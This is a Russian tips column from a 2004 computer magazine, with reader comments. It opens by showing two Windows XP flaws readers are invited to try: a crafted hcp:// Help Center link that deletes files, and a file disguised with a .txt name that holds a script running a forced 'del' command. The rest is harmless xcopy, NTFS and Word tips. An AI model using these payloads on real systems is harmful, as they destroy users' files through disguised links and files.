Советы и секреты


Неизвестные уязвимости Windows ХР

Знакомство с некоторыми ошибками системы порой может превратиться в увлекательное занятие, особенно если в их существовании можно удостовериться собственными руками. Приступим. Internet Explorer содержит обработчик для приложения "Центр справки и поддержки", который может быть запущен при переходе по специальной ссылке в браузере. Как оказалось, браузер выполняет такие запросы с неправильными ограничениями безопасности. А поскольку один элемент "Центра справки и поддержки" (uplddrvinfo.htm) содержит компонент ActiveX, позволяющий удалять файлы, которые передаются в него в качестве параметра, то нападающий может создать злонамеренную ссылку, которая без предупреждения пользователя удалит файлы на диске. Попробуйте сами: hcp://system/DFS/uplddrvinfo.htm?file://c:\windows\media\*

Создайте HTML-страницу и разместите в ней ссылку. После перехода по ней запустится "Центр справки и поддержки". Если в окне нажать кнопку "Отмена", а затем "Готово", то все файлы из папки "Media" будут удалены. С таким же хладнокровием "Центр справки и поддержки" может стереть и более важные файлы, достаточно просто подкорректировать ссылку.

Следующая ошибка позволяет при просмотре папок "Проводником" сделать так, чтобы запускаемый файл отображался с расширением txt. В подтверждение тут же создадим файл с именем readme.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B} и содержанием следующего характера:

<script>
a=new ActiveXObject("WSCript.Shell");
a.run("cmd /k del /f /q c:\\windows\\media\\*");
</script>
 

После попытки прочесть файлик в "Проводнике" папка Media будет безжалостно очищена.


Копирование прав доступа

По умолчанию, при копировании файлов из одного NTFS-раздела на другой права доступа к ним выставляются такие же, как и у каталога-приемника. Но в некоторых случаях это недопустимо, например, при перемещении личных файлов пользователей в другое место. Чтобы в Windows XP скопировать файлы с сохранением их собственных прав доступа, придется воспользоваться консольной командой Xcopy. Принцип работы ее такой же, как и у обычной команды копирования: xcopy c:\my_file d:\temp. Чтобы копирование происходило с переносом прав, следует использовать ключ /o.

Иногда возникает необходимость, сохраняя структуру разветвленного каталога, очищать его от всех данных - так на каникулах поступают со студенческими папками на сервере. Сделать это можно при помощи xcopy, копируя только структуру каталога - ключи /t и /e. В Windows 2000 аналогом данной команды является Scopy.


Ускорение NTFS

Оказывается, для совместимости со старыми приложениями Windows XP создает в разделе с NTFS специальную таблицу, содержащую все имена файлов и папок, представленные в формате MS-DOS: 8 + 3. В настоящее время это неактуально, поэтому для увеличения производительности такую функцию следует отключить. Делается это, конечно же, через реестр: HKLM\System\CurrentControlSet\Control\FileSystem, где нужно отыскать (или создать, если такового нет) параметр NtfsDisable8dot3NameCreation и установить его значение в 1.


Выделяем вертикальный блок текста

Чтобы в текстовом редакторе Word выделить вертикальный блок текста, надо предварительно нажать комбинацию клавиш Ctrl + Shift + F8, после чего можно передвигать курсор мышью или при помощи клавиш, выделяя текст прямоугольной областью.


"Горячие" клавиши Word

Ctrl + Shift + D - текст с двойным подчеркиванием (используется для пущей убедительности).

Ctrl + Shift + K - текст, набранный капителями (уменьшенными заглавными буквами).

Дмитрий БАРДИЯН,
localgroup@tut.by

Версия для печатиВерсия для печати

Номер: 

10 за 2004 год

Рубрика: 

Software
Заметили ошибку? Выделите ее мышкой и нажмите Ctrl+Enter!
 

Комментарии

Аватар пользователя Kostya
прямоугольником выделять можно, удерживая ALT.
Аватар пользователя Vova_fighetr
- К счастью обнаружил что в w2k "Центра справки и поддержки" не оказалось;

- Так же попробовал с readme.txt, скрипты выполнять решился тока проводник и то мой антивирус его остановил... но все равно мудно ;)

Аватар пользователя Инкогнито
Можно, конечно, и с Альтом, но это только мышой. А так можно очень метко стрелять.
Аватар пользователя Не скажу
> ошибка позволяет при просмотре папок "Проводником" сделать так, чтобы запускаемый файл отображался с расширением txt. В подтверждение тут же создадим файл с именем readme.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}

Не понял. Расширение у файла ведь вовсе не .txt, а .{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}. Ведь это не одно и то же, правда? ;)

А ускорение NTFS - это ерунда, выигрыша на копейку, а все досовские программы и Win16 работать не смогут.

Аватар пользователя Tolyan
Я понимаю всё.......может и я в это втянусь.....но! кому в кайф гнать вирус в сеть ....не пойму
Аватар пользователя Хвостатый
Ребятки! Скачайте "справочник Windows XP"

Там еще куча всяких полезностей по ускорению системы, залепливанию дырок в безопасности и дры дры дры.

Я вот скачал и бед не знаю....:)

Аватар пользователя NIkolai
Интересная статья ,молодец!